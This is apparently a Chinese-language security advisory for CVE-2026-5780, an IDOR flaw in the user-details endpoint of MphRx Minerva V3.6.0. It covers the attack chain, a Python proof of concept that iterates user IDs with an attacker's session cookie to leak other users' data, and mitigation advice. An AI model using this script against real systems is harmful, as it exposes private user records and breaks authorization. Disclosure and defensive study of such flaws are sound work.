CVE-2026-5780 CVSS 8.1 高危

CVE-2026-5780 MphRx Minerva IDOR漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5780

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MphRx Minerva

漏洞概述

MphRx Minerva V3.6.0版本中存在严重的不安全的直接对象引用（IDOR）漏洞，该漏洞具体位于'/minerva/moUser/show/' API端点。由于系统未对服务器端的资源访问请求实施充分的权限验证机制，经过身份认证的低权限攻击者可以通过篡改HTTP请求中的用户ID参数，成功绕过授权检查。利用此漏洞，攻击者能够非法获取系统中任意其他注册用户的详细敏感信息，甚至导出完整用户列表，造成严重的数据泄露风险。

技术细节

该漏洞的技术根源在于应用程序在处理'/minerva/moUser/show/'端点的请求时，直接使用了客户端提交的用户标识符（ID）作为数据库查询的关键参数，而未在服务器端实施严谨的权限归属校验。在标准的Web安全模型中，访问控制应在服务器端强制执行，即系统必须验证当前请求者的会话身份是否具备查看目标资源ID的权限。在Minerva V3.6.0版本中，这一安全检查机制被绕过。攻击者利用此漏洞的流程通常如下：首先，攻击者注册一个普通账号并完成登录，获取合法的Session Cookie或Token；其次，通过抓包工具分析发现'/minerva/moUser/show/'接口接受递增或可预测的ID参数；最后，攻击者编写脚本自动化遍历ID值，发送携带自身凭证但ID被篡改的请求。由于系统仅依据ID返回数据，攻击者即可成功获取其他用户的详细信息，实现水平越权访问。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者注册合法账户并登录，获取有效的Session ID或身份令牌。

STEP 2

2. 端点分析

通过抓包分析发现'/minerva/moUser/show/'接口通过URL路径或参数传递用户ID。

STEP 3

3. ID篡改尝试

修改请求中的用户ID参数（如从100改为101），保持自身认证凭证不变发送请求。

STEP 4

4. 数据窃取

服务器响应返回了ID为101的用户数据，确认存在IDOR漏洞，进而批量遍历获取所有用户信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target.com/minerva/moUser/show/"
# Attacker's session cookie obtained after login
session_cookie = {"session_id": "attacker_valid_session_token"}

def check_idor(user_id):
    # Construct the payload by modifying the ID in the endpoint
    full_url = f"{target_url}{user_id}"
    try:
        # Send request with authentication to exploit IDOR
        response = requests.get(full_url, cookies=session_cookie)
        if response.status_code == 200:
            print(f"[+] Success for ID {user_id}: Data leaked")
            # print(response.json()) # View leaked data
        else:
            print(f"[-] Failed for ID {user_id}")
    except Exception as e:
        print(f"Error: {e}")

# Iterate through potential user IDs to exploit the vulnerability
for i in range(1, 100):
    check_idor(i)

影响范围

MphRx Minerva V3.6.0

防御指南

临时缓解措施

建议立即升级至官方修复的最新版本。在未升级前，应在Web应用防火墙（WAF）中部署规则，严格监控对'/minerva/moUser/show/'端点的请求，禁止非管理员用户访问敏感用户ID接口。同时，加强服务器端的权限验证逻辑，确保用户只能访问自己有权访问的数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表